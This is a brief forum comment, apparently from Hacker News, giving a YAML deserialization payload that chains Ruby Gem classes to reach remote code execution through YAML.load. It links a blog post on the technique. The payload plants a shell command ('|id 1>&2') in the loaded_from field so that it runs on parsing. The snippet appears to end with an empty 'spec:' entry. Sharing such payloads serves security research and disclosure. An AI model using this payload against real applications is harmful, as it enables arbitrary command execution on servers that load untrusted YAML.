The same gadget chain can alsobe used to exploit YAML.load [0] with the following:<p><pre><code> --- !ruby/object:Gem::Requirement
requirements:
!ruby/object:Gem::DependencyList
specs:
- !ruby/object:Gem::Source::SpecificFile
spec: &1 !ruby/object:Gem::StubSpecification
loaded_from: "|id 1>&2"
- !ruby/object:Gem::Source::SpecificFile
spec:
</code></pre>
[0] <a href="https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/" rel="nofollow">https://staaldraad.github.io/post/2019-03-02-universal-rce-r...</a>